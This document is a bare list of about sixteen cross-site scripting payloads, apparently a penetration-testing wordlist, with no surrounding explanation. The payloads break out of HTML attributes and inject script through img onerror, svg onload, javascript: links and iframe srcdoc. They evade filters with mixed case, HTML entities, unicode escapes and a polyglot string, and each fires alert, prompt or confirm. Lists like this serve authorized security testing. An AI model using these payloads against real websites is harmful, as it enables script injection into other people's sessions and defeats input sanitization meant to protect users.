"><img sRc=l oNerrOr=prompt() x>
<!--<img src=--><img src=x onerror=alert`` x>
<a id="a"href=javascript&colon;alert&lpar;1&rpar; id="a">Click</a>
\"><img sRc=l oNerrOr=prompt() x>
<iMg sRc=x:alert`` oNError=eval(src)>
"><sCript x>confirm``</script x>
'"><svg/onload=alert()>
"'><iMg sRc=x:alert`` oNError=eval(src)>
'"><svG oNLoad=confirm&#x28;1&#x29>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
'">/*-/*`/*\`/*'/*"/**/(/* */<sVg/OnloAd=prompt() x>
"'--!><Script x>prompt()</scRiPt x>
'"--!><sVg/oNLoad=confirm()><"
"><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
